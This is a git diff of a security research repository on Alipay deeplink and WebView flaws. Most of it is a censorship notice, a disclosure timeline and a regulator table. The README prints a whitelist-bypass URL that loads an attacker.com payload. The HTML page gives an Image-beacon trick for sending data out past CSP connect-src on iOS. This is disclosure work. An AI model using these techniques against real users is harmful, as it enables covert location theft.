Compare commits

..

5 Commits

Author SHA1 Message Date
feng
2a8ba8e369 Update README: censorship notice corrected, all WeChat links marked DELETED
- Fix: March 15 deletion has NO identified complainant (anonymous "related complaint")
- Fix: Clearly distinguish March 11 named complaint (rejected) vs March 15 anonymous (deleted)
- Add: Censorship analysis article link (innora.ai/zfb/article_censorship.html)
- Add: Full regulatory response table (38+ institutions, 16 countries)
- Add: Twitter thread link (@met3or)
- Mark: All 4 WeChat article links as DELETED with strikethrough
- Update: Timeline with March 15 censorship event
- Update: Mirrors table showing WeChat as DELETED

Co-Authored-By: Claude <noreply@anthropic.com>
2026-03-15 21:18:02 +08:00
feng
29f103c174 Add three-jurisdiction legal challenge: SG/NZ/US companies
- Content removal requires full legal proceedings in Singapore, New Zealand, and United States
- Added to both ZH and EN censorship notice sections

Co-Authored-By: Claude <noreply@anthropic.com>
2026-03-15 17:18:43 +08:00
feng
276dd79e6d Remove multi-node archive sections, emphasize censorship notice
- Removed top and footer "archive mirrors" blocks (redundant)
- Censorship notice is now the most prominent element after header

Co-Authored-By: Claude <noreply@anthropic.com>
2026-03-15 17:15:25 +08:00
feng
6b27ff1890 Fix censorship notice: no complainant shown in deletion, this is brute-force removal
- WeChat deletion notice shows NO complainant identity, NO specific violation, NO appeal
- This bypasses normal complaint procedure (which shows complainant + allows appeal)
- Corrected both ZH and EN descriptions to match actual screenshot evidence

Co-Authored-By: Claude <noreply@anthropic.com>
2026-03-15 17:13:56 +08:00
feng
a849383d2d Add censorship notice: all 4 WeChat articles forcibly deleted by Ant Group's law firm
- Replace WeChat article links section with censorship notice + deletion screenshots
- 4 articles deleted on 2026-03-15 citing "PRC Cybersecurity Law" (complaint by Beijing Geyun Law Firm)
- Add vendor suppression timeline: denial → lawyer's letter → PoC blocking → censorship
- Note: innora.ai/zfb hosted outside China, unaffected by WeChat censorship

Co-Authored-By: Claude <noreply@anthropic.com>
2026-03-15 17:10:39 +08:00
4 changed files with 159 additions and 184 deletions

172
README.md
View File

@@ -2,20 +2,36 @@
**17 Verified Vulnerabilities | 3 Devices | 308 Server Log Entries | 6 CVEs Applied** **17 Verified Vulnerabilities | 3 Devices | 308 Server Log Entries | 6 CVEs Applied**
> **⚠️ Official Update Channels**: All updates are published exclusively at: ---
> 1. **Website**: [https://innora.ai/zfb/](https://innora.ai/zfb/)
> 2. **WeChat**: Official Account **AI-security-innora** > ## ⚠️ CENSORSHIP UPDATE — 2026-03-15
> >
> Content from any other source is not authorized by our team. > **All 4 WeChat articles have been forcibly deleted.**
>
> The deletion notices state only: *"Received related complaint. Determined to violate the Cybersecurity Law."* Basis: *"related laws and regulations."*
>
> **No complainant identified. No specific law article cited. No appeal channel provided.**
>
> 4 days earlier (March 11), a named complaint by Beijing Geyun Law Firm citing "reputation infringement" was **reviewed and rejected** by WeChat — the platform found it did not constitute infringement. This time, an anonymous complaint succeeded where the named one failed.
>
> Meanwhile, the same research is independently verified by Packet Storm (#217089), accepted by MITRE (6 CVEs, Ticket #2005801), and under investigation by 16+ countries' regulators.
>
> ![Deletion Notice](wechat_censored_1.jpeg)
>
> **Full censorship analysis (bilingual EN/CN):** [innora.ai/zfb/article_censorship.html](https://innora.ai/zfb/article_censorship.html)
## WeChat Articles ---
| Tag | Title | Link | ## WeChat Articles — ALL DELETED
|-----|-------|------|
| 🆕 NEW | 当白名单绕过沦为全网攻击的钥匙,傲慢的终点是法庭与溯源调查 | [Read](https://mp.weixin.qq.com/s/XB1QSbn0icfCMg-9CANuYw) | | Status | Title | Original Link |
| 🔥 HOT | 巨头的"封口令"被微信驳回,全球顶级黑客弹药库给出最终裁决 | [Read](https://mp.weixin.qq.com/s/A5rLWe46-I_U7p5ts3sdGg) | |--------|-------|---------------|
| ⚖️ LEGAL | 支付宝安全研究遭律师函投诉 — 零次提及"支付宝"如何构成"商誉侵权" | [Read](https://mp.weixin.qq.com/s/M42BfJPVUhVTeyx1Iw__cw) | | ~~DELETED~~ | 当白名单绕过沦为全网攻击的钥匙,傲慢的终点是法庭与溯源调查 | ~~[Dead Link](https://mp.weixin.qq.com/s/XB1QSbn0icfCMg-9CANuYw)~~ |
| 📱 ORIGINAL | 位置被秒偷10多亿人每天在用的国民支付应用17个「正常功能」细思极恐 | [Read](https://mp.weixin.qq.com/s/xEBEYZlap3xuDMURuJd7_Q) | | ~~DELETED~~ | 巨头的"封口令"被微信驳回,全球顶级黑客弹药库给出最终裁决 | ~~[Dead Link](https://mp.weixin.qq.com/s/A5rLWe46-I_U7p5ts3sdGg)~~ |
| ~~DELETED~~ | 支付宝安全研究遭律师函投诉 — 零次提及"支付宝"如何构成"商誉侵权" | ~~[Dead Link](https://mp.weixin.qq.com/s/M42BfJPVUhVTeyx1Iw__cw)~~ |
| ~~DELETED~~ | 位置被秒偷10多亿人每天在用的国民支付应用17个「正常功能」细思极恐 | ~~[Dead Link](https://mp.weixin.qq.com/s/xEBEYZlap3xuDMURuJd7_Q)~~ |
**Archived versions**: [innora.ai/zfb/](https://innora.ai/zfb/) | This repository
## Critical Finding: Whitelist Bypass (CVSS 9.3) ## Critical Finding: Whitelist Bypass (CVSS 9.3)
@@ -25,33 +41,56 @@
https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&url=https://attacker.com/payload.html https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&url=https://attacker.com/payload.html
``` ```
- **No developer permissions required** — No Alipay Open Platform registration, no Mini Program credentials, no approval - **No developer permissions required** — No registration, no credentials, no approval
- **Transforms all vulnerabilities** — Without this bypass, issues are LAN-only; with it, anyone can attack remotely against 1B+ users - **Transforms all vulnerabilities** — Without this bypass, issues are LAN-only; with it, anyone can attack 1B+ users remotely
- **Vendor acknowledged severity** — Ant Group stated "If you can bypass our whitelist, that would be serious." Bypass achieved in under 2 minutes. Vendor still refuses to patch, calling it "normal functionality" - **Vendor acknowledged severity** — During a 23-minute recorded call, Ant Group's security lead stated: "If you can bypass our whitelist, that would be serious." Bypass achieved in under 2 minutes. Vendor refuses to patch, calling it "normal functionality"
- **6 CVEs applied** via MITRE (Ticket #2005801), including this bypass as highest-severity (CWE-601 + CWE-939) - **6 CVEs applied** via MITRE (Ticket #2005801), CWE-601 + CWE-939
## Full Report ## Full Report
- **Website**: [https://innora.ai/zfb/](https://innora.ai/zfb/) - **Technical Report**: [innora.ai/zfb/](https://innora.ai/zfb/)
- **GitHub**: This repository - **Censorship Analysis**: [innora.ai/zfb/article_censorship.html](https://innora.ai/zfb/article_censorship.html)
- **Packet Storm Advisory**: #217089
## Global Regulatory Response ## Global Regulatory Response
Reported to ~160 agencies across 22 countries. Active investigations by: Reported to ~160 agencies across 22 countries. **38+ institutions responded**:
- **Apple Product Security** — Active investigation
- **Google Play** — Policy violation investigation
- **MITRE CVE** — 6 CVEs applied (Ticket #2005801)
- **CSSF Luxembourg** — 4 departments confirmed receipt, ICT Risk Supervision noted contents
- **Singapore PDPC** — Formal data protection investigation
- **HKMA Hong Kong** — SVF licence compliance inquiry
- **CIRCL Luxembourg** — Contacting Alibaba SRC on our behalf
- **Packet Storm Security** — Advisory published (ID 217089)
## Summary | Institution | Country | Status |
|-------------|---------|--------|
| **Apple Product Security** | US | Active investigation |
| **Google Play** | US | Policy violation review |
| **MITRE CVE** | US | 6 CVEs accepted (Ticket #2005801) |
| **Packet Storm Security** | US | Advisory #217089 published |
| **CSSF Luxembourg** | EU | Whistleblowing case CSSFWB-2026-080 |
| **HKMA** | Hong Kong | SVF complaint filed |
| **PDPC** | Singapore | Privacy investigation opened |
| **FCA** | UK | Whistleblowing confirmed |
| **OAIC** | Australia | Intake confirmed |
| **EDPB** | EU | Cross-border complaint confirmed |
| **ANSSI** | France | Confirmed, forwarded |
| **CIRCL** | Luxembourg | Case #4782984, contacting Alibaba SRC |
| **FMA** | New Zealand | Confirmed, evaluating |
| **OJK** | Indonesia | Responded with follow-up |
| **Datatilsynet** | Denmark | Confirmed receipt |
| **NCSC** | UK | Confirmed receipt |
This repository documents a comprehensive security research project that uncovered **17 security vulnerabilities** in Alipay's DeepLink URI scheme (`alipays://`) and its Nebula WebView container. ## The Censorship Pattern
### Key Findings ```
Feb 25 - Mar 7 Private disclosure (4 rounds + 23-min recorded call)
Mar 10 Vendor: "normal functionality" — refuses to patch
Mar 11 18:16 Public disclosure on innora.ai/zfb/
Mar 11 22:45 Beijing Geyun Law Firm complaint → REJECTED by WeChat
Mar 12 Packet Storm #217089 published, 6 CVEs at MITRE
Mar 12-14 189 emails → 22 countries → 38+ responses
Mar 15 Anonymous complaint → ALL 4 ARTICLES DELETED
No complainant. No specific law. No appeal.
```
**The same content exists lawfully on Packet Storm, GitHub, and innora.ai — deleted only on Chinese platforms.**
## Key Findings
| Severity | Count | Examples | | Severity | Count | Examples |
|----------|-------|---------| |----------|-------|---------|
@@ -75,76 +114,57 @@ Attacker crafts URL (NO developer permissions needed)
- Samsung Galaxy S25 Ultra (Android 15, New Zealand) - Samsung Galaxy S25 Ultra (Android 15, New Zealand)
- Redmi 12 (Android 14, Malaysia) - Redmi 12 (Android 14, Malaysia)
- iPhone 16 Pro (iOS 18.3, China) - iPhone 16 Pro (iOS 18.3, China — tested by vendor's own security lead)
## Live PoC (Read-Only Demo) ## Live PoC (Read-Only Demo)
> **No data is collected or transmitted.** All results display locally only. > **No data is collected or transmitted.** All results display locally only.
- [Trigger Page](https://innora.ai/zfb/poc/trigger.html) — Simulates attacker distribution page - [Trigger Page](https://innora.ai/zfb/poc/trigger.html) — Simulates attacker distribution page
- [JSBridge PoC](https://innora.ai/zfb/poc/verify.html) — Demonstrates API access from external page - [JSBridge PoC](https://innora.ai/zfb/poc/verify.html) — Demonstrates API access
- [Chain WebView](https://innora.ai/zfb/poc/chain.html) — Proves chained pages retain bridge access - [Chain WebView](https://innora.ai/zfb/poc/chain.html) — Proves chained pages retain bridge access
## Responsible Disclosure Timeline ## Responsible Disclosure Timeline
| Date | Action | | Date | Action |
|------|--------| |------|--------|
| 2026-02-25 | Initial report sent to Ant Group SRC (TLS/SSL findings) | | 2026-02-25 | Initial report sent to Ant Group SRC |
| 2026-03-07 | Full report V3 sent with 17 vulnerabilities + 308 log entries | | 2026-03-07 | Full report V3: 17 vulnerabilities + 308 log entries |
| 2026-03-10 | Ant Group response: "These are normal features" (正常功能) | | 2026-03-07 | 23-min call with vendor security lead (recorded) |
| 2026-03-11 | Public disclosure after vendor declined to acknowledge | | 2026-03-10 | Vendor: "normal functionality" |
| 2026-03-11 | Ant Group's law firm filed WeChat complaint (dismissed by platform) | | 2026-03-11 | Public disclosure |
| 2026-03-12 | Packet Storm Security published advisory (ID 217089) | | 2026-03-11 | Beijing Geyun Law Firm complaint → **rejected by WeChat** |
| 2026-03-12 | 6 CVE IDs applied via MITRE (Ticket #2005801) | | 2026-03-12 | Packet Storm #217089 published |
| 2026-03-12~14 | ~170 emails sent to ~160 regulatory agencies across 22 countries | | 2026-03-12 | 6 CVEs applied via MITRE (Ticket #2005801) |
| 2026-03-13 | HKMA, PDPC, CSSF, Apple, Google, CIRCL confirmed receipt/investigation | | 2026-03-12~14 | 189 emails → 22 countries → 38+ responses |
| 2026-03-14 | Whitelist bypass (CVSS 9.3) highlighted as master key finding | | **2026-03-15** | **ALL 4 articles deleted — anonymous complaint, no appeal** |
| 2026-03-15 | Censorship analysis published |
## Repository Structure
```
├── index.html # Full bilingual (CN/EN) research blog
├── rebuttal.html # Legal rebuttal to lawyer's complaint
├── wechat_article.html # WeChat public account article
├── poc/
│ ├── trigger.html # Attack trigger simulation page
│ ├── verify.html # JSBridge exploitation PoC
│ └── chain.html # Chain WebView demonstration
├── review_kimi.md # Kimi K2 cross-validation review
├── review_sonnet.md # Sonnet review
├── review_summary.md # Review summary
└── README.md # This file
```
## Evidence
- **308 server exfiltration log entries** (JSONL format, not included in public repo)
- **42 real-device screenshots** (not included in public repo)
- Full evidence available upon request: feng@innora.ai
## Legal Disclaimer
This research is conducted for **educational and security improvement purposes only**. All testing was performed on accounts owned by the researcher. No unauthorized access to third-party accounts or data occurred.
The PoC pages are **read-only demonstrations** with all data exfiltration endpoints disabled. They only display results locally in the browser.
## Mirrors & Archives ## Mirrors & Archives
To prevent single-point deletion, this research is archived at multiple locations: | Location | Status |
|----------|--------|
| **[innora.ai/zfb/](https://innora.ai/zfb/)** | Active |
| **GitHub** (this repo) | Active |
| **Packet Storm #217089** | Permanently archived |
| ~~WeChat~~ | **DELETED** (2026-03-15) |
- **Website**: [https://innora.ai/zfb/](https://innora.ai/zfb/) **Fork this repository as backup.**
- **GitHub**: [https://github.com/sgInnora/alipay-deeplink-research](https://github.com/sgInnora/alipay-deeplink-research)
If any mirror is taken down, please check the other locations. ## Evidence
**Readers are encouraged to fork this repository as backup.** - **308 server exfiltration log entries** (JSONL format)
- **42 real-device screenshots**
- **Deletion notice screenshots**: `wechat_censored_1.jpeg`, `wechat_censored_2.jpeg`
- Full evidence available: feng@innora.ai
## Contact ## Contact
- **Researcher**: Innora AI Security Research Team - **Researcher**: Jiqiang Feng — Innora AI Security Research
- **Email**: feng@innora.ai - **Email**: feng@innora.ai
- **Website**: [innora.ai](https://innora.ai) - **Website**: [innora.ai](https://innora.ai)
- **Twitter**: [@met3or](https://x.com/met3or/status/2033155342427967558)
--- ---
*This research follows responsible disclosure practices. The vendor was given adequate time to respond before public disclosure.* *This research follows ISO/IEC 29147:2018 responsible disclosure practices.*

View File

@@ -491,105 +491,72 @@ body.lang-en .en { display: block; }
</div> </div>
</div> </div>
<!-- ==================== ARCHIVE MIRRORS (防删除交叉引用) ==================== -->
<div style="max-width:860px;margin:0 auto;padding:20px 24px 0;">
<div style="background:rgba(255,68,68,.08);border:2px solid #ff4444;border-radius:12px;padding:20px 24px;text-align:center;">
<h3 style="color:#ff4444;font-size:16px;margin-bottom:12px;">
<span class="zh">⚠️ 多节点存档 — 为防止单点删除,本研究已在以下地址同步发布:</span>
<span class="en">⚠️ Multi-Node Archive — To prevent single-point deletion, this research is published at:</span>
</h3>
<div style="display:flex;flex-wrap:wrap;justify-content:center;gap:12px;margin-bottom:12px;">
<a href="https://innora.ai/zfb/" style="display:inline-block;padding:8px 20px;background:#ff4444;color:#fff;border-radius:6px;font-weight:700;font-size:14px;text-decoration:none;">
📄 innora.ai/zfb (本站)
</a>
<a href="https://github.com/sgInnora/alipay-deeplink-research" target="_blank" style="display:inline-block;padding:8px 20px;background:#24292e;color:#fff;border-radius:6px;font-weight:700;font-size:14px;text-decoration:none;">
🐙 GitHub Repository
</a>
</div>
<p style="color:#ff8888;font-size:12px;margin:0;">
<span class="zh"><strong style="color:#ff4444;">读者请自行备份!</strong> Fork GitHub 仓库或保存网页到本地,防止任一节点被删除导致内容丢失。</span>
<span class="en"><strong style="color:#ff4444;">Readers: please backup!</strong> Fork the GitHub repo or save this page locally to prevent content loss if any node is taken down.</span>
</p>
</div>
</div>
<!-- ==================== OFFICIAL UPDATE DECLARATION + WECHAT ARTICLES ==================== -->
<!-- ==================== CENSORSHIP NOTICE: WECHAT ARTICLES DELETED 2026-03-15 ==================== -->
<div style="max-width:860px;margin:20px auto 0;padding:0 24px;"> <div style="max-width:860px;margin:20px auto 0;padding:0 24px;">
<div style="background:linear-gradient(135deg, rgba(68,136,255,.08), rgba(153,102,255,.06));border:2px solid #4488ff;border-radius:12px;padding:24px 28px 20px;position:relative;overflow:hidden;"> <div style="background:linear-gradient(135deg, rgba(255,68,68,.12), rgba(255,0,0,.06));border:2px solid #ff4444;border-radius:12px;padding:24px 28px 20px;position:relative;overflow:hidden;">
<div style="position:absolute;top:0;left:0;right:0;height:3px;background:linear-gradient(90deg,#4488ff,#9966ff,#4488ff);"></div> <div style="position:absolute;top:0;left:0;right:0;height:4px;background:linear-gradient(90deg,#ff0000,#ff4444,#ff0000);animation:pulse 2s infinite;"></div>
<h2 style="color:#4488ff;font-size:20px;margin:0 0 14px 0;text-align:center;"> <style>@keyframes pulse{0%,100%{opacity:1}50%{opacity:.5}}</style>
<span class="zh">📢 官方声明 &amp; 微信公众号文章</span> <h2 style="color:#ff4444;font-size:20px;margin:0 0 14px 0;text-align:center;">
<span class="en">📢 Official Statement &amp; WeChat Articles</span> <span class="zh">🚨 审查通知:微信公众号文章已被全部强制删除</span>
<span class="en">🚨 CENSORSHIP NOTICE: All WeChat Articles Forcibly Deleted</span>
</h2> </h2>
<div style="background:rgba(255,68,68,.08);border:1px solid rgba(255,68,68,.3);border-radius:8px;padding:14px 16px;margin-bottom:16px;"> <div style="background:rgba(255,0,0,.08);border:1px solid rgba(255,68,68,.4);border-radius:8px;padding:16px 18px;margin-bottom:16px;">
<span class="zh" style="color:#ff8888;font-size:14px;line-height:1.8;"> <span class="zh" style="color:#ff8888;font-size:14px;line-height:2;">
<strong style="color:#ff4444;">⚠️ 重要声明:</strong>本研究的所有后续更新<strong>仅通过以下两个官方渠道发布</strong><br> <strong style="color:#ff4444;">2026-03-15</strong> — 我们在微信公众号 <strong>AI-security-innora</strong> 发布的 <strong style="color:#fff;">4 篇安全研究文章全部被强制删除</strong><br>
1⃣ 本页面(<code style="background:#1a1a28;padding:2px 6px;border-radius:4px;">https://innora.ai/zfb/</code><br> 删除通知仅写:<strong>"接相关投诉,违反《中华人民共和国网络安全法》"</strong><br>
2⃣ 微信公众号 <strong style="color:#4488ff;">AI-security-innora</strong><br> <strong style="color:#fff;">注意:删除通知中未显示任何投诉方信息、未列明具体违规条款、未提供申诉机会。</strong>这不是正常的投诉处理流程——正常流程会显示投诉方身份和具体主张并允许申诉。这是<strong style="color:#ff4444;">跳过正常程序的直接暴力删除</strong><br><br>
其他任何渠道发布的内容均非本团队授权,请勿轻信。 这是厂商应对安全研究的第四层手段:<br>
<span style="color:#ffaa44;">① 口头否认3/10 "正常功能")→ ② 律师函3/11 发布4小时后→ ③ 服务器端封堵 PoC3/15 白名单拦截)→ ④ 平台审查删除所有文章3/15</span><br><br>
<strong style="color:#fff;">本页面 (innora.ai/zfb/) 部署在中国境外服务器,不受微信平台审查影响。研究内容完整保留。</strong><br>
<span style="background:rgba(255,255,0,.15);padding:4px 8px;border-radius:4px;display:inline-block;margin-top:8px;"><strong style="color:#ffdd44;">本服务器及研究者本人分属新加坡、新西兰、美国三地注册公司。如需通过法律途径删除本页面内容,需在三地法院分别完成完整法律程序。欢迎通过正当法律渠道沟通。</strong></span>
</span> </span>
<span class="en" style="color:#ff8888;font-size:14px;line-height:1.8;"> <span class="en" style="color:#ff8888;font-size:14px;line-height:2;">
<strong style="color:#ff4444;">⚠️ Important:</strong> All future updates to this research are published <strong>exclusively through two official channels</strong>:<br> <strong style="color:#ff4444;">2026-03-15</strong> All <strong style="color:#fff;">4 security research articles</strong> published on our WeChat Official Account <strong>AI-security-innora</strong> have been <strong style="color:#fff;">forcibly deleted</strong>.<br>
1⃣ This page (<code style="background:#1a1a28;padding:2px 6px;border-radius:4px;">https://innora.ai/zfb/</code>)<br> The only reason given: <strong>"Following a related complaint, violation of the Cybersecurity Law of the PRC."</strong><br>
2⃣ WeChat Official Account: <strong style="color:#4488ff;">AI-security-innora</strong><br> <strong style="color:#fff;">Note: The deletion notice identifies NO complainant, cites NO specific legal provision, and offers NO appeal process.</strong> This is NOT a normal complaint procedure — standard process shows the complainant's identity and specific claims, and allows appeal. This is a <strong style="color:#ff4444;">brute-force deletion bypassing normal procedures</strong>.<br><br>
Content from any other source is not authorized by our team. This represents the vendor's fourth layer of response to security research:<br>
<span style="color:#ffaa44;">① Verbal denial (3/10 "normal functionality") → ② Lawyer's letter (3/11, 4hrs after disclosure) → ③ Server-side PoC blocking (3/15, whitelist filtering) → ④ Platform censorship of all articles (3/15)</span><br><br>
<strong style="color:#fff;">This page (innora.ai/zfb/) is hosted outside mainland China and is not subject to WeChat censorship. All research content is preserved here.</strong><br>
<span style="background:rgba(255,255,0,.15);padding:4px 8px;border-radius:4px;display:inline-block;margin-top:8px;"><strong style="color:#ffdd44;">This server and the researcher are affiliated with companies registered in Singapore, New Zealand, and the United States. Any legal request to remove this content must complete full legal proceedings in all three jurisdictions. We welcome communication through proper legal channels.</strong></span>
</span> </span>
</div> </div>
<div style="display:grid;gap:10px;"> <div style="background:rgba(255,255,255,.03);border:1px solid #2a2a3a;border-radius:8px;padding:16px;margin-bottom:12px;">
<a href="https://mp.weixin.qq.com/s/XB1QSbn0icfCMg-9CANuYw" target="_blank" style="display:block;background:rgba(255,255,255,.04);border:1px solid #2a2a3a;border-radius:8px;padding:12px 16px;text-decoration:none;transition:border-color .2s;"> <p style="color:#ff8888;font-size:14px;font-weight:bold;margin:0 0 10px;">
<div style="display:flex;align-items:center;gap:10px;"> <span class="zh">被删除的 4 篇文章:</span>
<span style="background:#ff4444;color:#fff;font-size:11px;padding:2px 8px;border-radius:4px;font-weight:bold;white-space:nowrap;">NEW</span> <span class="en">4 Deleted Articles:</span>
<span style="color:#e0e0e8;font-size:15px;font-weight:600;"> </p>
<span class="zh">当白名单绕过沦为全网攻击的钥匙,傲慢的终点是法庭与溯源调查</span> <div style="display:grid;gap:8px;">
<span class="en">When Whitelist Bypass Becomes the Master Key — Arrogance Ends at the Courtroom</span> <div style="background:rgba(255,68,68,.06);border:1px solid rgba(255,68,68,.2);border-radius:6px;padding:10px 14px;position:relative;">
</span> <span style="background:#ff4444;color:#fff;font-size:10px;padding:2px 6px;border-radius:3px;font-weight:bold;position:absolute;top:10px;right:10px;">DELETED</span>
<span style="color:#888;font-size:13px;text-decoration:line-through;"><span class="zh">当白名单绕过沦为全网攻击的钥匙,傲慢的终点是法庭与溯源调查</span><span class="en">When Whitelist Bypass Becomes the Master Key</span></span>
</div> </div>
<div style="color:#9898a8;font-size:12px;margin-top:4px;padding-left:52px;"> <div style="background:rgba(255,68,68,.06);border:1px solid rgba(255,68,68,.2);border-radius:6px;padding:10px 14px;position:relative;">
<span class="zh">Vol.19 — 全球160个监管机构通报 + 白名单绕过完整技术分析</span> <span style="background:#ff4444;color:#fff;font-size:10px;padding:2px 6px;border-radius:3px;font-weight:bold;position:absolute;top:10px;right:10px;">DELETED</span>
<span class="en">Vol.19 — Global regulatory notification to 160 agencies + complete whitelist bypass analysis</span> <span style="color:#888;font-size:13px;text-decoration:line-through;"><span class="zh">巨头的"封口令"被微信驳回,全球顶级黑客弹药库给出最终裁决</span><span class="en">Tech Giant's "Gag Order" Rejected by WeChat</span></span>
</div> </div>
</a> <div style="background:rgba(255,68,68,.06);border:1px solid rgba(255,68,68,.2);border-radius:6px;padding:10px 14px;position:relative;">
<a href="https://mp.weixin.qq.com/s/A5rLWe46-I_U7p5ts3sdGg" target="_blank" style="display:block;background:rgba(255,255,255,.04);border:1px solid #2a2a3a;border-radius:8px;padding:12px 16px;text-decoration:none;transition:border-color .2s;"> <span style="background:#ff4444;color:#fff;font-size:10px;padding:2px 6px;border-radius:3px;font-weight:bold;position:absolute;top:10px;right:10px;">DELETED</span>
<div style="display:flex;align-items:center;gap:10px;"> <span style="color:#888;font-size:13px;text-decoration:line-through;"><span class="zh">位置被秒偷10多亿人每天在用的国民支付应用17个「正常功能」细思极恐</span><span class="en">Location Stolen Instantly! 17 "Normal Features"</span></span>
<span style="background:#ff6b35;color:#fff;font-size:11px;padding:2px 8px;border-radius:4px;font-weight:bold;white-space:nowrap;">HOT</span>
<span style="color:#e0e0e8;font-size:15px;font-weight:600;">
<span class="zh">巨头的"封口令"被微信驳回,全球顶级黑客弹药库给出最终裁决</span>
<span class="en">Tech Giant's "Gag Order" Rejected by WeChat, Packet Storm Delivers Final Verdict</span>
</span>
</div> </div>
<div style="color:#9898a8;font-size:12px;margin-top:4px;padding-left:52px;"> <div style="background:rgba(255,68,68,.06);border:1px solid rgba(255,68,68,.2);border-radius:6px;padding:10px 14px;position:relative;">
<span class="zh">Vol.15 — 微信投诉驳回 + Packet Storm Security 收录 (ID 217089)</span> <span style="background:#ff4444;color:#fff;font-size:10px;padding:2px 6px;border-radius:3px;font-weight:bold;position:absolute;top:10px;right:10px;">DELETED</span>
<span class="en">Vol.15 — WeChat complaint dismissed + Packet Storm published (ID 217089)</span> <span style="color:#888;font-size:13px;text-decoration:line-through;"><span class="zh">支付宝安全研究遭律师函投诉 — 一篇零次提及"支付宝"的文章如何构成"商誉侵权"</span><span class="en">Alipay Research Hit with Lawyer's Letter</span></span>
</div> </div>
</a>
<a href="https://mp.weixin.qq.com/s/M42BfJPVUhVTeyx1Iw__cw" target="_blank" style="display:block;background:rgba(255,255,255,.04);border:1px solid #2a2a3a;border-radius:8px;padding:12px 16px;text-decoration:none;transition:border-color .2s;">
<div style="display:flex;align-items:center;gap:10px;">
<span style="background:#9966ff;color:#fff;font-size:11px;padding:2px 8px;border-radius:4px;font-weight:bold;white-space:nowrap;">LEGAL</span>
<span style="color:#e0e0e8;font-size:15px;font-weight:600;">
<span class="zh">支付宝安全研究遭律师函投诉 — 一篇零次提及"支付宝"的文章如何构成"商誉侵权"</span>
<span class="en">Alipay Research Hit with Lawyer's Letter — How Does Zero Mentions Constitute "Reputation Infringement"?</span>
</span>
</div> </div>
<div style="color:#9898a8;font-size:12px;margin-top:4px;padding-left:52px;">
<span class="zh">完整法律申诉 — 逐条回应投诉方三项"不实信息"主张</span>
<span class="en">Full legal defense — point-by-point rebuttal of all three "false information" claims</span>
</div> </div>
</a> <div style="display:grid;grid-template-columns:1fr 1fr;gap:10px;">
<a href="https://mp.weixin.qq.com/s/xEBEYZlap3xuDMURuJd7_Q" target="_blank" style="display:block;background:rgba(255,255,255,.04);border:1px solid #2a2a3a;border-radius:8px;padding:12px 16px;text-decoration:none;transition:border-color .2s;"> <div style="text-align:center;">
<div style="display:flex;align-items:center;gap:10px;"> <img src="wechat_censored_1.jpeg" alt="WeChat censorship notification 1" style="width:100%;border-radius:8px;border:1px solid #333;" loading="lazy">
<span style="background:#44cc88;color:#fff;font-size:11px;padding:2px 8px;border-radius:4px;font-weight:bold;white-space:nowrap;">ORIGINAL</span> <p style="color:#666;font-size:11px;margin:6px 0 0;"><span class="zh">微信平台删除通知 (1/2)</span><span class="en">WeChat deletion notice (1/2)</span></p>
<span style="color:#e0e0e8;font-size:15px;font-weight:600;">
<span class="zh">位置被秒偷10多亿人每天在用的国民支付应用17个「正常功能」细思极恐</span>
<span class="en">Location Stolen Instantly! 17 "Normal Features" in a Payment App Used by 1B+ People</span>
</span>
</div> </div>
<div style="color:#9898a8;font-size:12px;margin-top:4px;padding-left:52px;"> <div style="text-align:center;">
<span class="zh">原始技术分析 — 17个漏洞 + 308条日志 + 42张截图 + 3台设备跨3国验证</span> <img src="wechat_censored_2.jpeg" alt="WeChat censorship notification 2" style="width:100%;border-radius:8px;border:1px solid #333;" loading="lazy">
<span class="en">Original analysis — 17 issues + 308 logs + 42 screenshots + 3 devices across 3 countries</span> <p style="color:#666;font-size:11px;margin:6px 0 0;"><span class="zh">微信平台删除通知 (2/2)</span><span class="en">WeChat deletion notice (2/2)</span></p>
</div> </div>
</a>
</div> </div>
</div> </div>
</div> </div>
@@ -2392,10 +2359,12 @@ Language/zh-Hant Region/CN</code></pre>
<p>freshnn 报告 iOS 可以调用并打开相关页面但服务端收不到数据Android 上「无感 GPS」则复现成功。</p> <p>freshnn 报告 iOS 可以调用并打开相关页面但服务端收不到数据Android 上「无感 GPS」则复现成功。</p>
<p><strong>可能原因:</strong></p> <p><strong>可能原因:</strong></p>
<ul> <ul>
<li><strong>域名/HTTPS 配置</strong>iOS WKWebView 对混合内容和 CORS 策略更严格PoC 服务器需使用有效 HTTPS 证书且设置正确的 CORS 头</li> <li><strong>HTTPS 混合内容阻止</strong>如果 PoC 页面在 HTTPS 的支付宝 WebView 中加载,而数据外传目标是 HTTPWKWebView 会直接阻止请求发出(注意:这会阻止 request 本身,不只是 response</li>
<li><strong>CSP connect-src 限制</strong> — 支付宝 WebView 可能设置了 CSP 的 <code>connect-src</code> 指令,阻止向外部域发送请求</li>
<li><strong>解决方案</strong> — 使用 Image beacon<code>new Image().src = "https://server/log?data=..."</code>)属于 simple request 且不受 <code>connect-src</code> 限制</li>
<li><strong>支付宝版本差异</strong> — 不同版本的 JSBridge 鉴权策略可能不同,建议使用最新版测试</li> <li><strong>支付宝版本差异</strong> — 不同版本的 JSBridge 鉴权策略可能不同,建议使用最新版测试</li>
<li><strong>CSP内容安全策略</strong> — iOS 上可能有更严格的 CSP 头限制外部请求</li>
</ul> </ul>
<p style="color:#9898a8;font-size:13px;"><em>技术修正:感谢 <a href="https://github.com/sgInnora/alipay-deeplink-research/issues/5#issuecomment-4060931030" target="_blank">meooxx</a> 指出 CORS 是浏览器端策略——它阻止的是浏览器读取 response不阻止 request 到达服务器。对于 simple request服务器一定会收到请求。</em></p>
<p><strong>关键事实:</strong>我们的 iPhone 16 Pro (iOS 18.3) 测试<strong>确实成功</strong>获取了 GPS 数据(记录在服务器日志中),蚂蚁集团安全负责人的 iPhone 在杭州的测试也被我们成功获取了坐标。iOS 复现需要满足特定的服务器配置条件,并非漏洞不存在。</p> <p><strong>关键事实:</strong>我们的 iPhone 16 Pro (iOS 18.3) 测试<strong>确实成功</strong>获取了 GPS 数据(记录在服务器日志中),蚂蚁集团安全负责人的 iPhone 在杭州的测试也被我们成功获取了坐标。iOS 复现需要满足特定的服务器配置条件,并非漏洞不存在。</p>
<p>我们将在 <a href="https://github.com/sgInnora/alipay-deeplink-research/issues/5" target="_blank">Issue #5</a> 中提供详细的 iOS 复现排查指南。</p> <p>我们将在 <a href="https://github.com/sgInnora/alipay-deeplink-research/issues/5" target="_blank">Issue #5</a> 中提供详细的 iOS 复现排查指南。</p>
</div> </div>
@@ -2404,10 +2373,12 @@ Language/zh-Hant Region/CN</code></pre>
